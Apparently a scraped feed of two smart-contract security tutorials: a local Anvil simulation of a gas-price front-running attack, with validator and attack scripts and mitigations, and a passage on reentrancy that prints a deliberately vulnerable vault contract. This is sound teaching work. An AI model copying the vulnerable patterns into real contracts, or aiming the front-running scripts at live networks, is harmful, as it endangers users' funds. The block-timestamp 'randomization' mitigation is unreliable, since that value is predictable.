**Anvil** is a powerful tool provided by the Foundry suite, designed to act as a lightweight, high-speed local Ethereum node. It serves as a testing and development blockchain, similar to tools like Ganache or Hardhat Network. Anvil enables developers to simulate blockchain environments for smart contract testing, debugging, and experimentation.

**Key features of Anvil include:**

-   A fully-featured local blockchain environment with instant transaction processing.
-   Preconfigured accounts with ETH for testing purposes.
-   The ability to manipulate block timing, mining, and chain state for fine-grained control.
-   Seamless integration with Foundry&apos;s tools like **forge** and **cast**.

![](/content/images/2024/11/image-26.png)

Example of Anvil after running

### What is Cast?

**Cast** is a command-line interface tool within the Foundry ecosystem that allows developers to interact directly with Ethereum networks. It’s highly versatile, enabling everything from sending transactions to querying contract state and balances.

**Key features of Cast include:**

-   Simple commands for deploying contracts and interacting with smart contracts.
-   Support for querying blockchain data, such as balances, gas prices, and block details.
-   Compatibility with both local (Anvil) and live networks.

&lt;details&gt;
&lt;summary&gt;Here is an example of running cast to deploy the vulnerable contract:&lt;/summary&gt;

```solidity
forge create src/BiomechanicalRace.sol:BiomechanicalRace --private-key 0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80  --rpc-url &quot;http://localhost:8545&quot;
[⠊] Compiling...
[⠆] Compiling 1 files with Solc 0.8.28
[⠰] Solc 0.8.28 finished in 166.76ms
Compiler run successful!
Deployer: 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266
Deployed to: 0x5FbDB2315678afecb367f032d93F642f64180aa3
Transaction hash: 0x33382874b2c20d8a59c8e7ae9b499f0eeee8bb20f042879008a787d2857e90ca

```
&lt;/details&gt;


### Setting the Stage for the Attack Simulation

For this simulation, we will leverage both **Anvil** and **Cast** to recreate a realistic blockchain environment where we execute and observe the behavior of a front-running attack.

-   **Anvil** will provide the blockchain infrastructure, with accounts funded and transactions processed locally, mimicking the Ethereum mainnet.
-   **Cast** will allow us to programmatically deploy contracts, send transactions, and monitor balances.

### Introducing the Custom Validator

In addition to Anvil and Cast, we will use a **custom validator**—a script we developed to simulate the role of a real blockchain validator. This validator:

-   Monitors the pending transaction pool (mempool).
-   Prioritizes transactions based on gas prices.
-   Simulates mining behavior by selecting high-priority transactions for inclusion in blocks.

## Simulating the Validator for Front-Running

Now that we&apos;ve explored the BiomechanicalRace contract and the concept of front-running vulnerabilities, it’s time to introduce another layer to our simulation: a custom validator. This component helps us mimic real-world blockchain behavior where validators select and process transactions based on specific criteria, such as gas prices.

#### Understanding Validators

Validators are the backbone of blockchain networks. Their role is to verify transactions, bundle them into blocks, and append these blocks to the blockchain. In Ethereum, validators (or miners, in the case of Proof-of-Work) typically prioritize transactions with higher gas fees because these offer greater rewards. This behavior creates an opportunity for front-runners to exploit the mempool, submitting transactions with higher fees to get ahead in the queue.

In our simulation, we’ll use a **custom-built validator script** to recreate this decision-making process. The validator will:

1.  **Monitor the Mempool:** Listen for pending transactions.
2.  **Prioritize Transactions:** Sort transactions by gas price to simulate real-world prioritization.
3.  **Simulate Mining:** Include the highest-priority transactions in a block.

**Prerequisites**

To use the validator, ensure the following are installed:

-   **Node.js:** The runtime for executing the validator script.
-   **ethers.js:** A library for Ethereum blockchain interactions.
-   **axios:** An HTTP client for sending RPC requests to Anvil.

&lt;details&gt;
&lt;summary&gt;Install the necessary dependencies with the following command:&lt;/summary&gt;

```bash
npm install ethers axios

```
&lt;/details&gt;


For a smooth development experience, install `nodemon`, a utility that automatically restarts the script when changes are made:

```bash
npm install -g nodemon

```

**The Validator Script**

Below is the custom validator script. Save it as `validator.js`:

&lt;details&gt;
&lt;summary&gt;Validator Script&lt;/summary&gt;

```js
const { ethers } = require(&quot;ethers&quot;);
const axios = require(&quot;axios&quot;);

// Connect to Anvil
const provider = new ethers.JsonRpcProvider(&quot;http://localhost:8545&quot;);

console.log(&quot;Validator connected to Anvil&quot;);

// List to store pending transactions
let pendingTransactions = [];

// Listen for pending transactions
provider.on(&quot;pending&quot;, async (txHash) =&gt; {
  try {
    const tx = await provider.getTransaction(txHash);

    if (tx) {
      console.log(&quot;\nTransaction detected:&quot;);
      console.log(`  Hash: ${tx.hash}`);
      console.log(`  From: ${tx.from}`);
      console.log(`  To: ${tx.to || &quot;Contract Deployment&quot;}`);
      console.log(`  Value: ${ethers.formatEther(tx.value)} ETH`);

      const gasPrice = tx.gasPrice || tx.maxFeePerGas; // Handle different transaction types
      console.log(`  Gas Price: ${ethers.formatUnits(gasPrice, &quot;gwei&quot;)} gwei`);

      // Add to local mempool
      pendingTransactions.push(tx);
      console.log(&quot;Transaction added to local mempool.&quot;);
    }
  } catch (error) {
    console.error(`Error processing transaction ${txHash}:`, error);
  }
});

// Simulate block mining every 10 seconds
setInterval(async () =&gt; {
  if (pendingTransactions.length &gt; 0) {
    console.log(&quot;\nMining a new block...&quot;);

    // Sort transactions by gas price (descending order)
    pendingTransactions.sort((a, b) =&gt; {
      const gasA = a.maxFeePerGas || a.gasPrice;
      const gasB = b.maxFeePerGas || b.gasPrice;
      return gasB.gt(gasA) ? 1 : -1; // Prioritize higher gas
    });

    const selectedTx = pendingTransactions.shift(); // Select the highest-priority transaction

    try {
      console.log(&quot;Selected transaction for mining:&quot;, selectedTx.hash);

      // Simulate block mining using Anvil&apos;s RPC
      await axios.post(&quot;http://localhost:8545&quot;, {
        jsonrpc: &quot;2.0&quot;,
        method: &quot;evm_mine&quot;,
        params: [],
        id: 1,
      });

      console.log(&quot;Transaction mined in new block:&quot;, selectedTx.hash);
    } catch (error) {
      console.error(&quot;Error mining transaction:&quot;, error.message);
    }
  }
}, 10000); // Attempt to mine every 10 seconds

// Listen for new blocks
provider.on(&quot;block&quot;, (blockNumber) =&gt; {
  console.log(`\nNew block mined: ${blockNumber}`);
});

```
&lt;/details&gt;


**What The Validator does**

-   **Transaction Monitoring:** The validator continuously listens for pending transactions and logs their details (e.g., sender, recipient, value, and gas price).
-   **Transaction Sorting:** Transactions are sorted by gas price, prioritizing those with higher fees.
-   **Block Mining Simulation:** The validator uses Anvil’s `evm_mine` RPC method to simulate block mining, ensuring prioritized transactions are processed first.

## Explaining the Attack Simulation Script

The script is designed to simulate a front-running attack on the **BiomechanicalRace** contract, leveraging the transparency of the blockchain and transaction prioritization based on gas fees. Below, we’ll break down the script step by step, explaining each part and its role in the simulation.

&lt;details&gt;
&lt;summary&gt;The attack Simulation Script&lt;/summary&gt;

```bash
#!/bin/bash

# Forzar el formato de números en inglés (punto como separador decimal)
export LC_NUMERIC=&quot;en_US.UTF-8&quot;

# Set up variables
RPC_URL=&quot;http://localhost:8545&quot;
ADMIN_PK=&quot;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&quot;
PLAYER_PK=&quot;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&quot;
ATTACKER_PK=&quot;0x5de4111afa1a4b94908f83103eb1f1706367c2e68ca870fc3fb9a804cdab365a&quot;
CONTRACT_NAME=&quot;BiomechanicalRace&quot;
CONTRACT_PATH=&quot;src/BiomechanicalRace.sol:$CONTRACT_NAME&quot;

# Deploy contract using forge
echo &quot;Deploying contract using forge...&quot;
CONTRACT_ADDRESS=$(forge create $CONTRACT_PATH \
                             --private-key $ADMIN_PK \
                             --rpc-url $RPC_URL | grep &quot;Deployed to&quot; | awk &apos;{print $NF}&apos;)
echo &quot;Contract deployed at: $CONTRACT_ADDRESS&quot;

# Fund contract with 20 ETH
echo &quot;Funding contract with 20 ETH...&quot;
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ADMIN_PK \
          --value 20ether
echo &quot;Contract funded.&quot;

# Player places a bet (in background)
echo &quot;Player placing a bet...&quot;
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $PLAYER_PK \
          --value 3ether \
          --gas-price 70000000000 \
          &quot;placeBet(uint256)&quot; 1 &amp;
player_pid=$!

# Attacker places a front-running bet with higher gas price (in background)
echo &quot;Attacker placing a front-running bet...&quot;
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          --value 3ether \
          --gas-price 80000000000 \
          &quot;placeBet(uint256)&quot; 1 &amp;
attacker_pid=$!

# Wait for both transactions to complete
wait $player_pid
wait $attacker_pid

echo &quot;Both bets placed.&quot;

# End the race and declare a winner
echo &quot;Ending the race...&quot;
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ADMIN_PK \
          &quot;endRace(uint256)&quot; 1
echo &quot;Race ended. Winner declared.&quot;

# Player claims winnings
echo &quot;Player claiming winnings...&quot;
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $PLAYER_PK \
          &quot;claimWinnings()&quot;
echo &quot;Player winnings claimed.&quot;

# Attacker claims winnings
echo &quot;Attacker claiming winnings...&quot;
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          &quot;claimWinnings()&quot;
echo &quot;Attacker winnings claimed.&quot;

# Display final balances
echo &quot;Final balances:&quot;
admin_balance=$(cast balance 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266 --rpc-url $RPC_URL)
player_balance=$(cast balance 0x70997970C51812dc3A010C7d01b50e0d17dc79C8 --rpc-url $RPC_URL)
attacker_balance=$(cast balance 0x3C44CdDdB6a900fa2b585dd299e03d12FA4293BC --rpc-url $RPC_URL)

# Convert balances to ETH
admin_eth=$(awk &quot;BEGIN {print $admin_balance / 10^18}&quot;)
player_eth=$(awk &quot;BEGIN {print $player_balance / 10^18}&quot;)
attacker_eth=$(awk &quot;BEGIN {print $attacker_balance / 10^18}&quot;)

# Round to 4 decimal places
admin_eth=$(printf &quot;%.4f&quot; $admin_eth)
player_eth=$(printf &quot;%.4f&quot; $player_eth)
attacker_eth=$(printf &quot;%.4f&quot; $attacker_eth)

echo &quot;Admin: $admin_eth ETH&quot;
echo &quot;Player: $player_eth ETH&quot;
echo &quot;Attacker: $attacker_eth ETH&quot;

```
&lt;/details&gt;


#### **Step 1: Deploying the Contract**

The script starts by deploying the smart contract to the Anvil blockchain. This sets up the environment with the vulnerable contract.

```bash
CONTRACT_ADDRESS=$(forge create $CONTRACT_PATH \
                             --private-key $ADMIN_PK \
                             --rpc-url $RPC_URL | grep &quot;Deployed to&quot; | awk &apos;{print $NF}&apos;)
echo &quot;Contract deployed at: $CONTRACT_ADDRESS&quot;

```

Here, the contract is deployed using `forge create`, and its address is captured into the variable `CONTRACT_ADDRESS` for further interactions.

#### **Step 2: Funding the Contract**

The next step is to fund the contract with 20 ETH to ensure it can pay rewards after the race concludes.

```bash
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ADMIN_PK \
          --value 20ether
echo &quot;Contract funded.&quot;

```

This transaction sends 20 ETH from the admin account to the deployed contract.

#### **Step 3: Placing Bets**

The script simulates a legitimate player placing a bet. This transaction is sent in the background. Simultaneously, the attacker places a front-running bet with a higher gas price to ensure their transaction is prioritized.

Player’s bet:

```bash
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $PLAYER_PK \
          --gas-price 70000000000 \
          &quot;placeBet(uint256)&quot; 1 &amp;
player_pid=$!

```

Attacker’s bet:

```bash
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          --value 3ether \
          --gas-price 80000000000 \
          &quot;placeBet(uint256)&quot; 1 &amp;
attacker_pid=$!

```

Both transactions are sent concurrently using the `&amp;` operator, and the script waits for them to complete with the following:

```bash
wait $player_pid
wait $attacker_pid

```

This setup creates a realistic scenario where the attacker exploits the higher gas fee to front-run the player’s bet.

#### **Step 4: Ending the Race**

The admin concludes the race by declaring a winner. This triggers the contract’s logic to calculate rewards for participants.

```bash
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ADMIN_PK \
          &quot;endRace(uint256)&quot; 1
echo &quot;Race ended. Winner declared.&quot;

```

#### **Step 5: Claiming Winnings**

Both the player and the attacker claim their winnings after the race ends. The attacker’s front-running bet ensures they receive a disproportionately higher reward.

&lt;details&gt;
&lt;summary&gt;Player claiming winnings:&lt;/summary&gt;

```bash
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $PLAYER_PK \
          &quot;claimWinnings()&quot;
echo &quot;Player winnings claimed.&quot;

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;Attacker claiming winnings:&lt;/summary&gt;

```bash
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          &quot;claimWinnings()&quot;
echo &quot;Attacker winnings claimed.&quot;

```
&lt;/details&gt;


#### **Step 6: Displaying Final Balances**

The script retrieves and displays the final balances of the admin, player, and attacker. The balances are converted from wei to ETH for readability.

&lt;details&gt;
&lt;summary&gt;Fetching balances:&lt;/summary&gt;

```bash
admin_balance=$(cast balance 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266 --rpc-url $RPC_URL)
player_balance=$(cast balance 0x70997970C51812dc3A010C7d01b50e0d17dc79C8 --rpc-url $RPC_URL)
attacker_balance=$(cast balance 0x3C44CdDdB6a900fa2b585dd299e03d12FA4293BC --rpc-url $RPC_URL)

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;Converting to ETH:&lt;/summary&gt;

```bash
admin_eth=$(awk &quot;BEGIN {print $admin_balance / 10^18}&quot;)
player_eth=$(awk &quot;BEGIN {print $player_balance / 10^18}&quot;)
attacker_eth=$(awk &quot;BEGIN {print $attacker_balance / 10^18}&quot;)

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;Formatting for output:&lt;/summary&gt;

```bash
echo &quot;Admin: $admin_eth ETH&quot;
echo &quot;Player: $player_eth ETH&quot;
echo &quot;Attacker: $attacker_eth ETH&quot;

```
&lt;/details&gt;


## Executing the Complete Simulation

Now that we’ve set up the necessary tools and scripts, let’s execute the simulation from start to finish. This includes running Anvil with a custom block mining time, executing our attack script, and analyzing the results to understand how gas price manipulation influences the outcome of the front-running attack.

#### **Step 1: Launching Anvil with a Block Time**

To give our custom validator enough time to prioritize and mine transactions before Anvil automatically processes them, we’ll start Anvil with a block time of 20 seconds. This ensures that the transactions are mined by our script rather than Anvil’s default automatic behavior.

&lt;details&gt;
&lt;summary&gt;Run the following command to start Anvil:&lt;/summary&gt;

```bash
anvil --block-time 20

```
&lt;/details&gt;


#### **Step 2: Starting the Validator**

With Anvil running, the next step is to start our custom validator. The validator monitors the mempool for incoming transactions, prioritizes them based on gas prices, and simulates block mining. This ensures that transactions with higher gas prices are processed first.

&lt;details&gt;
&lt;summary&gt;Run the following command to start the validator:&lt;/summary&gt;

```bash
nodemon validator.js

```
&lt;/details&gt;


![](/content/images/2024/12/image-1.png)

Validator&apos;s logs

#### **Step 3: Running the Attack Script**

With Anvil running, execute the attack simulation script. This script deploys the **BiomechanicalRace** contract, funds it, simulates the player’s and attacker’s bets, ends the race, and displays the final balances.

&lt;details&gt;
&lt;summary&gt;Run the script:&lt;/summary&gt;

```bash
bash simulate-attack.sh

```
&lt;/details&gt;


![](/content/images/2024/12/image.png)

Running the attack

#### **Step 4: Observing the Effect of Gas Prices**

The simulation clearly demonstrates how gas price manipulation impacts transaction prioritization. When the attacker sets a higher gas price (e.g., 80 gwei) compared to the player&apos;s lower gas price (e.g., 70 gwei), the validator prioritizes the attacker’s transaction, allowing it to be processed first. This gives the attacker access to a more favorable multiplier under the **BiomechanicalRace** contract, maximizing their rewards.

In contrast, when the player uses a higher gas price, their transaction gets processed first, shifting the advantage in their favor. The following results showcase the outcomes in both scenarios:

-   **Attacker Prioritization (Higher Gas)**: The attacker receives disproportionately larger rewards due to their transaction being mined first.
-   **Player Prioritization (Higher Gas)**: The player secures better winnings, showcasing how gas price effectively alters transaction order and payout structure.

![](/content/images/2024/12/image-2.png)

This is the case when the Attacker use more Gas than the Player

![](/content/images/2024/12/image-3.png)

Opposite case

The differences in the final ETH balances underscore the significant influence of gas price on transaction order and outcomes, reinforcing how open and transparent mempool systems can be exploited without proper safeguards.

# Making the Contract Secure

One effective strategy to mitigate front-running is the **commit-reveal scheme**. In this approach, bettors first submit a hashed version of their bet during a commit phase, concealing the details of their transaction. Later, in a reveal phase, the bettor discloses the actual bet details along with the corresponding hash. This ensures that no one, including potential attackers, can discern the contents of a bet until it is revealed. For example, in the BiomechanicalRace contract, this would involve storing the hash of the bet during the commit phase:

```solidity
mapping(address =&gt; bytes32) public commitHashes;
bool public commitPhase;

function commitBet(bytes32 hash) external {
    require(commitPhase, &quot;Commit phase is not active&quot;);
    commitHashes[msg.sender] = hash;
}

```

Once the commit phase ends, users can reveal their bets by submitting the details along with the original hash:

```solidity
function revealBet(uint256 creatureId, uint256 amount, bytes32 salt) external payable {
    require(!commitPhase, &quot;Reveal phase is not active&quot;);
    require(commitHashes[msg.sender] == keccak256(abi.encodePacked(creatureId, amount, salt)), &quot;Invalid reveal&quot;);

    creatures[creatureId].totalBets += amount;
    bets[msg.sender][creatureId] += amount;
    totalBets += amount;
}

```

This method ensures that bet details are obscured during submission, mitigating the risk of front-running.

Another layer of protection can be added through **randomized bet processing**. By introducing a mechanism that processes bets in a non-deterministic order, attackers cannot predict which bets will be prioritized. In the BiomechanicalRace contract, bets could be shuffled based on a pseudo-random value derived from block data:

```solidity
function processBetsRandomly() external {
    uint256 randomIndex = uint256(keccak256(abi.encodePacked(block.timestamp, block.difficulty))) % participants.length;
    address randomParticipant = participants[randomIndex];
    uint256 betAmount = bets[randomParticipant][1]; // Example for creature ID 1
    creatures[1].totalBets += betAmount;
    delete bets[randomParticipant][1];
}

```

For scenarios requiring enhanced privacy, incorporating **off-chain signing** can be valuable. With this approach, users generate and sign their bet data off-chain. The contract only verifies the signature on-chain, ensuring that the transaction details remain concealed until processing. In the BiomechanicalRace contract, this could look like:

```solidity
function placeSignedBet(
    uint256 creatureId,
    uint256 amount,
    bytes32 salt,
    bytes memory signature
) external payable {
    require(msg.value == amount, &quot;Incorrect ETH amount&quot;);
    bytes32 message = keccak256(abi.encodePacked(creatureId, amount, salt, address(this)));
    require(recoverSigner(message, signature) == msg.sender, &quot;Invalid signature&quot;);

    creatures[creatureId].totalBets += amount;
    totalBets += amount;
}

```

Additionally, implementing **time-locks** ensures that transactions are processed in batches within a set time frame, reducing the advantage of being the first to submit a transaction. The BiomechanicalRace contract could integrate time-locks to group bets:

```solidity
uint256 public batchStartTime;
uint256 public batchDuration = 10 minutes;

function startBatch() external {
    batchStartTime = block.timestamp;
}

function processBatchBets() external {
    require(block.timestamp &gt;= batchStartTime + batchDuration, &quot;Batch time not elapsed&quot;);
    // Process all bets placed during the batch
}

```

# Conclusions

Front-running vulnerabilities highlight the tension between transparency and security in blockchain systems. Using the **BiomechanicalRace** contract, we demonstrated how attackers exploit transaction visibility to gain an unfair advantage, leveraging tools like **Anvil**, **Cast**, and a custom validator to simulate and analyze the attack in detail. This process reinforced the need for robust smart contract design to mitigate such risks.

#### Key Takeaways:

1.  **Understanding Vulnerabilities**: Front-running is not a flaw in blockchain technology but a byproduct of its transparency, emphasizing the need for secure transaction ordering mechanisms.
2.  **Practical Demonstration**: By simulating attacks, we gained insight into how malicious actors exploit mempool visibility and the importance of prioritizing preventive measures.
3.  **Mitigation Strategies**: Approaches like **commit-reveal schemes** or **off-chain signing** can effectively address vulnerabilities, though they require balancing usability and security.

This exploration underscores the importance of comprehensive testing and innovative design strategies to build secure and trustworthy blockchain applications.

# References

-   Foundry - A Blazing Fast, Modular, and Portable Ethereum Development Framework. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
-   Solidity - Language for Smart Contract Development. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/](https://docs.soliditylang.org/)
-   OpenZeppelin - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)
-   Ethereum - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   Testing Ethereum Smart Contracts - Best Practices with Foundry. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/tutorials/testing](https://book.getfoundry.sh/tutorials/testing)
-   Ethereum Validators - An Overview of Ethereum Validators and Their Role. &quot;Ethereum Staking Documentation.&quot; Available at: https://ethereum.org/en/developers/docs/guides/staking/
-   Gas Price Mechanics - Understanding Gas and Transaction Fees in Ethereum. &quot;Ethereum Documentation.&quot; Available at: https://ethereum.org/en/developers/docs/gas/
-   Front-Running in DeFi - Risks and Mitigation Strategies. &quot;Chainlink Blog.&quot; Available at: https://blog.chain.link/front-running-defi/</content:encoded><author>Ruben Santos</author></item><item><title>The Traitor Within: Reentrancy Attacks Explained and Resolved</title><link>https://www.kayssel.com/post/web3-4</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-4</guid><description>This chapter explores reentrancy attacks in Ethereum, showcasing vulnerabilities in smart contracts and how they can be exploited using Foundry for testing. We demonstrate the attack strategy, implement a fix to secure the contract, and emphasize best practices for robust Solidity development.</description><pubDate>Sun, 24 Nov 2024 15:10:17 GMT</pubDate><content:encoded># Introduction

Reentrancy attacks are among the most notorious vulnerabilities in the Web3 space, often leading to catastrophic losses of funds in smart contracts. These attacks exploit the logic of a contract by recursively calling functions before previous operations complete, effectively manipulating balances and draining Ether. This chapter focuses on understanding, testing, and automating the detection of such vulnerabilities using **Foundry**, a powerful Solidity development framework.

#### What You&apos;ll Learn in This Chapter

1.  **Understanding Reentrancy Attacks**: We&apos;ll revisit what reentrancy is, including its mechanics and the devastating consequences it can have when left unaddressed. This includes a deep dive into fallback and `receive` functions, which are often instrumental in enabling such attacks.
2.  **The Vulnerable Contract**: We’ll analyze a fictional contract, `PiratesGuildVault`, which contains a subtle yet critical vulnerability. You&apos;ll learn to dissect its logic and understand why its implementation is prone to reentrancy.
3.  **The Malicious Contract**: Next, we’ll introduce the attacker&apos;s contract, `TheTraitorWithin`, specifically designed to exploit the vulnerable vault. This contract mimics real-world malicious strategies used in reentrancy attacks.
4.  **Automated Testing with Foundry**: Testing is the cornerstone of secure smart contract development. In this section, you’ll learn how to simulate a reentrancy attack using Foundry, automate the testing process, and analyze the results.
5.  **Common Pitfalls and Fixes**: After observing the test failures, we’ll discuss the root cause of these issues, including why the attack leads to exceptions when the vault is empty. You’ll see how edge-case handling, while important for testing, doesn&apos;t address the vulnerability itself but helps the tests run seamlessly.
6.  **Key Takeaways for Developers**:
    -   Always update internal balances **before** transferring Ether.
    -   Beware of unexpected recursion through fallback or `receive` functions.
    -   Automate your tests to catch subtle vulnerabilities like reentrancy early in development.

By the end of this chapter, you’ll not only understand how reentrancy works but also how to build robust testing frameworks that can expose such vulnerabilities. This practical, hands-on approach will leave you better equipped to write secure smart contracts and mitigate one of the most significant threats in Web3 development.

# **What is the Reentrancy Vulnerability in Web3?**

Reentrancy is one of the most notorious vulnerabilities in smart contract development, particularly on Ethereum and other blockchains using the Ethereum Virtual Machine (EVM). This vulnerability enables an attacker to exploit a contract by repeatedly calling back into it before the previous execution is complete, often resulting in unexpected behavior or, worse, the draining of funds.

## **How Does Reentrancy Work?**

At its core, the reentrancy vulnerability occurs when a contract transfers Ether to another address before fully updating its internal state. This allows the recipient, typically a malicious contract, to execute its own logic and re-enter the original contract&apos;s function, disrupting its intended flow.

## **Step-by-Step Breakdown of a Reentrancy Attack:**

1.  **The vulnerable contract (`VulnerableContract`) allows Ether withdrawals.** A user can deposit Ether into the contract, and they can later withdraw their balance using a `withdraw` function.
2.  **The attacker deploys a malicious contract (`MaliciousContract`).** This contract is designed to exploit `VulnerableContract` by repeatedly calling the `withdraw` function before it finishes executing.
3.  **The attack begins.** The attacker calls `withdraw` on `VulnerableContract`. Instead of simply transferring Ether and completing the transaction, the `MaliciousContract` executes its `fallback` or `receive` function to re-enter `withdraw`.
4.  **Funds are drained.** Because `VulnerableContract` hasn’t yet updated the attacker’s balance, the same withdrawal process can happen repeatedly until the contract’s Ether balance is depleted.

## **What is a Fallback Function?**

In Solidity, the fallback function is a special unnamed function that gets triggered when:

-   A contract receives Ether but doesn’t have a `receive` function.
-   A function call doesn’t match any existing function in the contract.

The fallback function acts as a catch-all and allows contracts to handle unexpected Ether transfers or unknown function calls. In the context of reentrancy, fallback functions are often used in malicious contracts to re-enter the vulnerable contract.

```solidity
// A simple contract with a fallback function
contract Example {
    fallback() external payable {
        // Logic to handle unexpected calls or Ether transfers
    }
}

```

### **How is `receive` Different from `fallback`?**

-   **`receive`:** Introduced in Solidity 0.6.0, it’s triggered when a contract receives plain Ether (no calldata).
-   **`fallback`:** Triggered when a function call doesn’t match any existing function, or when Ether is sent with calldata but no matching function exists.

If a contract has both `receive` and `fallback`, the `receive` function is prioritized when Ether is sent without calldata.

# **Switching Gears: Exploring Reentrancy with Foundry**

In this section, we’ll take a step away from the tools we’ve been using, such as Hardhat, and introduce a powerful alternative: **Foundry**. Foundry is a robust Ethereum development framework that’s gaining popularity due to its speed, simplicity, and focus on Solidity-based testing. As its usage continues to grow, it’s becoming increasingly valuable from an offensive security perspective to understand how it works. It offers an excellent environment for analyzing and experimenting with vulnerabilities like reentrancy, making it a must-know tool for security enthusiasts and professionals alike.

## **Installing Foundry**

Foundry provides a command-line tool called `forge`, which is at the core of the framework. Installing Foundry is straightforward and works on most systems.

1.  **Install Foundryup**: Foundryup is the installer and version manager for Foundry. To install it, open your terminal and run the following command:

```bash
curl -L https://foundry.paradigm.xyz | bash

```

Once installed, you&apos;ll need to source your shell configuration to add `foundryup` to your PATH:

```bash
source ~/.bashrc    # or ~/.zshrc, depending on your shell

```

2.  **Install Foundry**: After Foundryup is installed, you can install Foundry by running:

```bash
foundryup

```

This will install `forge` (the testing and compilation tool) and `cast` (a utility tool for Ethereum interactions).

3.  **Verify Installation**: Check that Foundry is installed by running:

```bash
forge --version

```

You should see the installed version of Forge.

## **Setting Up Your Project**

Now that Foundry is installed, let&apos;s create a new project where we&apos;ll build and test our contracts.

1.  **Initialize a Foundry Project:** Use the following command to create a new project:

```bash
forge init BountyVault

```

This will create a directory named `BountyVault` with a default folder structure:

```bash
BountyVault/
├── src/
│   └── Counter.sol    # Default contract
├── test/
│   └── Counter.t.sol  # Default test file
├── foundry.toml       # Configuration file

```

2.  **Project Structure**: Update your `src/` and `test/` folders with your own contracts and tests. For our reentrancy example:

```bash
BountyVault/
├── src/
│   ├── PiratesGuildVault.sol
│   ├── TheTraitorWithin.sol
├── test/
│   └── ReentrancyExploit.t.sol
├── foundry.toml

```

4.  **Compile Contracts**: Compile your contracts using:

```bash
forge build

```

# **Explaining the Pirate&apos;s Guild Vault Contract**

The **Pirate&apos;s Guild Vault** is a Solidity smart contract that serves as a shared repository for Ether, accessible only by registered members of a fictional pirate guild. Its design revolves around three main functionalities: joining the guild, depositing treasure, and withdrawing funds. Let’s walk through its core structure and functionality, with code snippets to highlight key sections.

&lt;details&gt;
&lt;summary&gt;Vulnerable Contract&lt;/summary&gt;

```solidity
pragma solidity ^0.8.0;

/**
 * @title Pirate&apos;s Guild Vault
 * @notice A shared vault for members of the pirate guild to store and withdraw their treasures.
 */
contract PiratesGuildVault {
    struct Member {
        uint256 balance;
        bool isMember;
    }

    mapping(address =&gt; Member) private guildMembers;
    uint256 public totalVaultBalance;

    modifier onlyMembers() {
        require(
            guildMembers[msg.sender].isMember,
            &quot;Only guild members can access the vault!&quot;
        );
        _;
    }

    /**
     * @dev Join the guild by becoming a member.
     */
    function joinGuild() external {
        require(
            !guildMembers[msg.sender].isMember,
            &quot;You are already a member of the guild!&quot;
        );

        guildMembers[msg.sender] = Member({balance: 0, isMember: true});
    }

    /**
     * @dev Deposit Ether into the guild&apos;s shared vault.
     */
    function deposit() external payable onlyMembers {
        require(msg.value &gt; 0, &quot;You must deposit some treasure!&quot;);

        guildMembers[msg.sender].balance += msg.value;
        totalVaultBalance += msg.value;
    }

    /**
     * @dev Withdraw Ether from your guild account.
     */
    function withdraw(uint256 amount) external onlyMembers {
        Member storage member = guildMembers[msg.sender];
        require(amount &gt; 0, &quot;Withdrawal amount must be greater than zero!&quot;);
        require(
            member.balance &gt;= amount,
            &quot;Not enough balance in your treasure account!&quot;
        );

        // Vulnerability: Ether is sent before the balance is updated
        (bool success, ) = msg.sender.call{value: amount}(&quot;&quot;);
        require(success, &quot;Failed to send Ether!&quot;);
        member.balance -= amount;
        totalVaultBalance -= amount;
        
    }

    /**
     * @dev Fallback function to accept Ether.
     */
    receive() external payable {
        totalVaultBalance += msg.value;
    }
}

```
&lt;/details&gt;


At its foundation, the contract uses a `struct` called `Member` to represent individual guild members. Each `Member` has two attributes: their Ether balance and their membership status. This data is stored in a `mapping` that links Ethereum addresses to `Member` records. Additionally, the contract tracks the total Ether stored in the vault through the `totalVaultBalance` variable.

```solidity
struct Member {
    uint256 balance;
    bool isMember;
}

mapping(address =&gt; Member) private guildMembers;
uint256 public totalVaultBalance;

```

To enforce guild exclusivity, a custom `onlyMembers` modifier is introduced. This modifier ensures that only registered guild members can execute certain functions. If a non-member attempts to access these functions, the contract will revert with an error message.

```solidity
modifier onlyMembers() {
    require(
        guildMembers[msg.sender].isMember,
        &quot;Only guild members can access the vault!&quot;
    );
    _;
}

```

Membership is managed through the `joinGuild` function. This function allows an address to register as a guild member, provided it is not already a member. Once added, the address is initialized with a balance of zero and is marked as a member.

```solidity
function joinGuild() external {
    require(
        !guildMembers[msg.sender].isMember,
        &quot;You are already a member of the guild!&quot;
    );

